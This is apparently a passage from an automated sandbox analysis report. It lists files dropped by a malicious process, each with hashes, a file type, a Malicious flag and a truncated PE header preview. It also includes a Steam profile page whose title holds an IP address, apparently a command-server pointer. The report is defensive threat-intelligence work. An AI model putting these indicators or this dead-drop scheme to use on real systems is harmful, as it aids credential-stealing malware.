                                                                                                                                                                                                                                SSDEEP:6144:ruFHcG6dc0A3+yfikluZRt6wfSYZc6pNLuvFJzPmhsiqvK5XEHAkgDkJEO:rCL3+YllubttfS16pNuTUqi1EE2EO
                                                                                                                                                                                                                                MD5:A463E516041F4BC84F03BC8FE2B643DD
                                                                                                                                                                                                                                SHA1:5A3EC50E94565671531E1CE66C2EE1D1A88A0E09
                                                                                                                                                                                                                                SHA-256:68024EBC8676FEB8C4B480F5042A8FE8F108A88FC20FC6DBFC3CF92707F148B8
                                                                                                                                                                                                                                SHA-512:5657068CF82679A6CC5636FE4F465834F9340EF0C48A35CA412988F50909922654291BED9178B8990EBA2430569E1EBECD45CAD119C5A524616C75187D4DABDE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..f.............................:... ...@....@.. ....................................`..................................:..S....@..............xO..(&...`......`9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................:......H........*..............................................................p....C...~V...{..S..gi.~f..<......(.Q>;&.&...F+.&/.g..c^.,q.v...[0..BW.e.P}..........(.....D.(D.h]....2..1.P..3@K........0JX....r...yJ.&...g....A...G..R`...6..t....<40........9.. !G..W*.`..6 #..D..7.;.{...-..4...TQ.0Vs..U..!DU..).np...!..l.S...H......A.D_.d...N.15.ouP...r.G..;.$qt.y...I.'...'...]?......d.........s<;(.yd3..4.:..U. .......n.9....u-![...~p..e.8....n.Cn`..8.q...J.L..$F.

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\66ee79315857f_setup33333[1].exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):418816
                                                                                                                                                                                                                                Entropy (8bit):6.7434348766555265
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:6FlsK6LzPfEoIw13JVbP2GOSbkee7xJVGZchwrWEKCoD0Yj8lmxEkuPF7:zK6HfEBsJVblOIQxGZYIWlaNV
                                                                                                                                                                                                                                MD5:2F59FBD6623872FBDC2F63D18023BFDA
                                                                                                                                                                                                                                SHA1:A71FD212DC780EDD062584ACFE3FC28A8090D039
                                                                                                                                                                                                                                SHA-256:0C50705ED7CFC68F11AECD4CEE0B808934D4957672AC0EA0615E9A1C31870A52
                                                                                                                                                                                                                                SHA-512:BD2CAEB7E88B333B31A864B66FE7B14CDF86560B488AE2B911893A059E184E7A80F0EDE8423AC8C10DE2BCFF3F5A85D1477F0A2E74986066F69D636D159B62F8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M............f......f./....f...\...."..........f......f.+....f.,....Rich...........PE..L.....%d.................H..........~>.......`....@.........................................................................J..x..................................LK...............................*..@...............$............................text...jG.......H.................. ..`.data........`...Z...L..............@....rsrc..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\66eea6336b153_app16540406983468141987[1].exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):331640
                                                                                                                                                                                                                                Entropy (8bit):7.987353721341769
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:abAWIT0bNaTfjfPsC/LEkuPlXVRKur64ZXzK7rrn31nvFRHW/SPxjM9jg3gfQ9:abA+bKTDjEkuPlFEurPm1nvvHW6Cjg3n
                                                                                                                                                                                                                                MD5:E8E6CD9EC48FAFCCC174F7BF07D045E2
                                                                                                                                                                                                                                SHA1:0DFCCF235DC62D2592F5062A1B9691043C14CC9E
                                                                                                                                                                                                                                SHA-256:76B4E6A99335D5FFA35E15863B544BF2EC9ED76CC8320E1D3E2F521A27018D07
                                                                                                                                                                                                                                SHA-512:33E6C097784B29D3CBA17B751B3E87EA9D583DBF19646897843471F96EFD88E9B64D529A5F2C9FA13B9EDAD5D7CCF8D454E496FC63F1B288C44FD8509E8C1459
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=..f............................^.... ........@.. .......................@............`.....................................S.......................x)... ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................@.......H...........................................................................6.....Z...9)..^........j...PtY.#..A.R.\...d.4..7.Z..&w.w|.5.':.T..*~...x....T...7M.w.Sa...Qp.R.t.u...qzD(&...4.. .:O.d....V[. c..l.prK.]..v....Y\_.{.....'..T.-f..av...w(H.n.]..gpj)...OKV.......q..Q..*y.P.!..Y;O.0.....@.y...t.".u...7n.B.=.......C^.=.Mi......4......b.~..t..d.......#......Xa`.I\.R!...'}>.}..X...J.v.__...n.....\..f.'>...}....."..j(..vFQC..'l..'7..p..:............

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\66ebb3bf78bd6_Send[1].exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3037032
                                                                                                                                                                                                                                Entropy (8bit):6.781602952551882
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:PqRtSgOLEJxW+BmNlgtTTqEva2+qb6Xy3gIYvfe2radRo8ap5XAnZ2JarsW:VgaEJxlBolgtCEvZuXyQbUzozXAnZUW
                                                                                                                                                                                                                                MD5:098E15E88E5332253356C78BADF8D479
                                                                                                                                                                                                                                SHA1:D5AAEB94EC0D92BD9AA7D4B76860E9C25CF10EE2
                                                                                                                                                                                                                                SHA-256:6B89CDFE0D3EBC90994EE564AAC9C88B0DF80F25720AEDADFF660A0D079AD0C9
                                                                                                                                                                                                                                SHA-512:27E7480332F7F07916399D9515057750E43F42D68AEBA095C77AB76616F899F49269EC78738F10D39D6869F67FF4EF768C03BA52A649C652AFA9EE161F2E1892
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$......... ...N...N...N......N.`6....N...K...N.#i....N.#i...N...M...N...J..N...K..N...O...N..P5...N.i.O..N...O.:.N.i.K..N.i.N...N.l....N.......N.i.L...N.Rich..N.........................PE..L.....%`.................8...........$.......P....@...................................!...@..........................%.....T...\.... ...f...........>..h............)..T...................D*.......)..@............P...............................text....@.......8.................. ..`.rdata...0...P...(...<..............@..@.data............n...d..............@....tls................................@....gfids..............................@..@.rsrc....f... ...h..................@..@........................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\76561199780418869[1].htm

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):34740
                                                                                                                                                                                                                                Entropy (8bit):5.400372709234735
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:Rdpqme0Ih3tAA6WG1IfcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2S8:Rd8me0Ih3tAA6WG1IFhTBv++nIjBtPFV
                                                                                                                                                                                                                                MD5:D45CC2EE8A28D0CF79B612B162B40D05
                                                                                                                                                                                                                                SHA1:019DABE882B9DAD59E92452DCA6AB2A964100ED2
                                                                                                                                                                                                                                SHA-256:CEE46554C0EDDEEAF23A218AE1EC1BC87FEA042A5285667A861A6BF6FD642942
                                                                                                                                                                                                                                SHA-512:1FC70646D70EC2DD8673B593DC6500FA390C0B0DD1141F3E1A798293B8C8FD388F94C4698825E8857BB6B1C02C654CF476E21996AB63C7D99015B1719CBA9C2E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://116.203.165.127|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link h

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\lgsfdam[1].exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):390560
                                                                                                                                                                                                                                Entropy (8bit):7.988255985085606
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:0dx0vN4gouCbr2AVHvPFFo9c1WAClFgmZLb38kHh4auf7I2uceHyJDPvHa+V4TgW:0d4ouIvlvPQ+NCLp1j5B4aAlLX/M0uEO
                                                                                                                                                                                                                                MD5:992176158EF56D4A8A2C4EEFBA240126
                                                                                                                                                                                                                                SHA1:F90D45C270B3A692B8AF3E4809447202FB23BA7A
                                                                                                                                                                                                                                SHA-256:202AFF26415F9BCE8F95FEFA36568C65D28FCA7A511C0D2E23991DCADCED7847
                                                                                                                                                                                                                                SHA-512:E7327363B437ABF958F5ED358C53ED57AEF4946C35AFFAD036A36A790AB5CE9C19279FA74AB83B0E95318E044B9907991D17F9B8FCDD225556D6BC6FAC2F5E6B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................ ........@.. ....................................`.....................................S...................x...(&..........`................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........................................................................b...8...<i......(P)N.V..v7N.C..9....g.P..62.....;.i....`....u..g...F....3.d.:....G.k.N.j.....y..w8w....PW.4k.h..iy.{....L,.[...q.=..p,w|.q...~.>}aNS..w..W.8S..>.X.....6...>Y.1T".n...OV.i.~b...p.......#S.....$o...^.v8...J....Aw...:.......$g&H..D.\.....tH...^.=53...]....F....6....hj5<.G..O..v5...~.%..i.....$#U..V.....r^HN.S.....1.L....fH.....ew....!......j>.....].....<..=B.k.\.{Bf

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\sdhsfd[1].exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):222112
                                                                                                                                                                                                                                Entropy (8bit):7.96837916071809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:I/NKt5fv5P2tInQP5loWIUKp6KgjfOc2PEO:IFuxv5OinA5lJQ6Kgb6EO
                                                                                                                                                                                                                                MD5:EA754070163F8ECA914B259096D834F0
                                                                                                                                                                                                                                SHA1:CEBF2ECCAD67DEAF6AC9B8DC71118AD474B16868
                                                                                                                                                                                                                                SHA-256:A893E20FEA08C8615DE1775AD3559EA6EFF35B5EC3B1AB6F463924285A84F47F
                                                                                                                                                                                                                                SHA-512:2A75B505780C6670204F5C4E2818BB1B027C88E98C9C45DDE39AED786AFAEFF60215AFB278FDD89EED58639C9ECCF901836DA4329D3C62C03911992B923CA225
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T..f.............................(... ...@....@.. ....................................`..................................(..S....@..............x=..(&...`......`'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......................................................................$..hII#MtzNi.T.............`...&g~....n~^..r.b..f.r.Ga.x.|....}.Ib....PL:d.6... ......:E$7....e.aW...!..m5..5@..7W...........H:....+.(g...\[.k.z5.b....yd.)8....]K.._.}oB$......<]....K..%...On..j...nA}.P^.f.6Z|.._*..XcsF^....O].CQ..w...*.K..ts........F...H...].?WT>"f.].*..v.......$_...Lm.?.AO[9....e.8.~.e.....]NH.[L7\C...I.{.|.A....\..F.L;M..CG.:..d..K>.....6"b..Ofy...u8...:.&.Qe7

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vsfdhgg15[1].exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):423328
                                                                                                                                                                                                                                Entropy (8bit):7.989339766042097
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:rBrkDIY0uBcDXK+KgEqBG7nkmfVRSG5rO4lNhCV6JRIc+9dIbCtWeJATEO:oNgYLkm9RSYbNhu6DS9dIbufWEO
                                                                                                                                                                                                                                MD5:92C66C140509B75BAE23F055D427AFB4
                                                                                                                                                                                                                                SHA1:1ECC289391AD3FCB89B3E84CBB15944A10444AE0
                                                                                                                                                                                                                                SHA-256:CC73160C4AF628FE13B6C3E83E06C5565FF67818B4148C13025786779BD4E127
                                                                                                                                                                                                                                SHA-512:0B8C7E30AF4F74BA7A49F106388172C025A008D0F7DE13B88C0340AB0AC9B3611D66429257D65DEE5459E5AEBE78F472E1AA3E687009365DE3E36FF166D4366D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>..f.............................:... ...@....@.. ....................................`..................................:..S....@..............xO..(&...`......`9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................:......H........*...............................................................j....(.m........u..B...+..g....M.....D..g..%n.w..M..O....@...f...[a....`.3..y..\L..y...G.........8...n..E.up.flqh...:...1H.C.................i..]6*..NgV...F.....t.A...b..h...\........r...&.&*kM.....Pa.FG....-I.%...T....'.|z.A......Sh.../......F...@...F.&...l...s.....J..F....j..5.e7....O.h..-k..U.N..`.........v.....^....S..;v.^..?.!.ZQx..^..Sh.4 .^..\.@.....-b.7..?......7+8....1....T6.

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\1[1].exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6666862
                                                                                                                                                                                                                                Entropy (8bit):6.624649438102188
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:AX+ACpyT3Q0Izx583ES5vXJY/IR7puRQ4Y4AOgtly:gBCpyTgvzL8UScWuRLY43Cly
                                                                                                                                                                                                                                MD5:8FB3610C4BA81A5A93666562E712740A
                                                                                                                                                                                                                                SHA1:FB8B6774E490680C1E04494D101F6CED3B7BE816
                                                                                                                                                                                                                                SHA-256:8F72E50FAC72D3C5880F79997F6CF38026B00D6F907BCD80C5D780CF92DB7158
                                                                                                                                                                                                                                SHA-512:6A833782EB81204D420841ACC1CD0D5F03BCE00D9725D850E5EF83A5C39C084E7BD1285582531A4092565BE9FA8409A7CFBCC0B74A5CEFD6DFAF9D4E4F5FD5CB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}.f.t_..%.........#.@H...Z...f..........PH...@.................................).f....... .........................B......................................h ............................H....................................................text....>H......@H.................`.P`.data........PH......FH.............@.`..rdata..8....pH......`H.............@.`@/4............I.......H.............@.0@.bss....T.f...L.......................`..edata..B.............L.............@.0@.idata................L.............@.0..CRT....4.............L.............@.0..tls.................L.............@.0..reloc..h ......"....L.............@.0B/14...................Z.............@..B/29......... ........Z.............@..B/41.....XL.......N...|\.............@..B/55.....B.... ........\.............@..B/67.....T.............].............@.0B/80.....a....0........].

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\66e705d09b33c_jack[1].exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4249600
                                                                                                                                                                                                                                Entropy (8bit):7.5486921675227485
                                                                                                                                                                                                                                Encrypted:false
